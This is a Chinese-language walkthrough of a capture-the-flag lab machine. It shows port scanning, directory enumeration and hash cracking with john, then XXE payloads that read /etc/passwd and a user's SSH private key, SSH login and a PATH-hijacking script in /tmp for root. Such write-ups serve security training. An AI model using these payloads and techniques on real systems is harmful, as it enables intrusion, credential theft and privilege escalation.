靶机ip:10.10.235.246

信息收集

nmap扫描

nmap -T4 -A -sV -sC -p- 10.10.235.246

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 15:02 CST
Stats: 0:05:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 98.06% done; ETC: 15:07 (0:00:06 remaining)
Stats: 0:05:45 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 15:08 (0:00:00 remaining)
Nmap scan report for 10.10.235.246
Host is up (0.30s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 3.X|5.X (90%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5.4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Linux 5.4 (88%), Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 275.52 ms 10.14.0.1
2 355.01 ms 10.10.235.246

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 361.77 seconds

可以看出开放了22,80,8765端口

80端口

image-20241015150958963

扫描下目录

gobuster dir -u http://10.10.235.246/ -w /usr/share/wordlists/dirb/common.txt

image-20241015151701655

发现有个robots.txt,访问一下

image-20241015151741043

没啥东西,继续查看其他目录文件

image-20241015152243976

/custom/js/下找到users.bak文件,像是备份文件,下载到本地查看

image-20241015152847711

看起来像是数据库中的数据,这里有admin的加密密码,尝试破解一下

image-20241015153022188

利用john成功获取到admin用户的明文密码bulldog19

8765端口

image-20241015151918464

像是admin后台登陆页面

使用之前获取到的用户名密码尝试登录

image-20241015153151381

成功登录

像是添加内容的一个页面,查看下源码

image-20241015153400373

又得到两个重要提示,一个是另一个bak文件,一个提示我们可以使用ssh连接Barry用key,但是我们目前还没有Barry用户的key

先看下bak文件

image-20241015153618211

内容有点像之前添加内容的格式,尝试添加一下

image-20241015153823235

发现格式正确,可以试下其他的内容,测试是否存在xxe漏洞

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>

image-20241015154121078

发现能够读取/etc/passwd文件,我们就可以尝试读取Barry用户的ssh私钥来登录该用户

SSH获取user权限

首先确定好私钥的绝对路径

/home/barry/.ssh/id_rsa

构造恶意内容

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>

image-20241015154505258

成功读取到私钥,将其保存至id_rsa文件**(注意格式)**,并赋予600权限,爆破加密私钥的密码

利用ssh通过私钥登录的方式常熟登录Barry用户

先将id_rsa转换成hash格式

image-20241015155420384

使用john爆破密码

john rsa_hash --wordlist=/usr/share/wordlists/rockyou.txt

image-20241015155545683

发现密码urieljames,使用私钥登录ssh

ssh barry@10.10.235.246 -i id_rsa

image-20241015155809630

登陆成功

image-20241015155833241

在当前目录下找到user.txt

提升至root权限

寻找提权目标

使用sudo -l试试

image-20241015160114807

发现用不了,再试试find命令

find / -type f -perm -u=s 2>/dev/null

image-20241015160335569

大多数命令都无法利用,但是发现有个不同的文件/home/joe/live_log,可以查看一下

image-20241015161615266

发现是一个elf文件,运行一下试试

image-20241015161642992

发现是打印网站的日志的功能

使用strings检查一下

image-20241015162039262

检查后发现这个文件在执行的时候会调用tail命令,我们就可以通过劫持该命令进行提权

劫持环境变量提权

具体操作如下:

1
2
3
4
echo '#!/bin/bash' > /tmp/tail
echo '/bin/bash' >> /tmp/tail
chmod +x /tmp/tail
export PATH=/tmp:$PATH

image-20241015163231776

再运行时,就会按照顺序执行我们构造的tail命令,导致权限提升

image-20241015163312818

成功提权

image-20241015163344478

/root下找到root.txt